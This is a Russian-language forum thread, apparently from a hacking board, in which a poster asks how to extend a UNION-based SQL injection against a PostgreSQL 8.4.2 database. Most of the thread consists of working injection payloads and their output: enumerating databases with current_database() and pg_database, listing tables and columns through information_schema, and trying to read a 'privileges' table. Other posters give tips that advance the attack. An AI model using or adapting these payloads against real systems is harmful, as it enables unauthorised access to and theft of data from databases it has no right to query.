|
Версия: PostgreSQL 8.4.2
Выполняю запрос: Код HTML:
-' union select null,null,null,null,null,current_database()--somedatadb Второй запрос: Код HTML:
-' union select null,null,null,null,null,datname FROM pg_database--db1 db2 db3 Вопрос: Как можно смодулировать запрос с учетом предыдущего примера запроса, чтобы посмотреть содержимое db2. (пользователь имеет доступ на просмотр) Пробывал Код HTML:
-' union select null,null,null,null,null,table_name FROM db2-- |
Для начала начните использовать information_schema в PostgreSQL она тоже есть!
|
Делал уже, но как-то выдает таблицы базы в которой я нахожусь а не соседней:
Код HTML:
-' union select null,null,null,null,null,table_name FROM information_schema.tables WHERE table_schema = 'public'-- |
schema_name from information_schema.schemata
Если не ошибаюсь |
Разобрался:
Этот запрос показывает все таблицы (включая таблицы других баз) Код HTML:
-' union select null,null,null,null,null,table_name FROM information_schema.tablesКод HTML:
-' union select null,null,null,null,null,column_name FROM information_schema.columns WHERE table_name ='privileges'--server_ID usr_ID priv_type А как собственно посмотреть данные этих колонн? Такой запрос просто не показывает каких либо данных.... Код HTML:
-' union select null,null,null,null,null,cast(server_ID as text) FROM privileges-- |
| Время: 23:39 |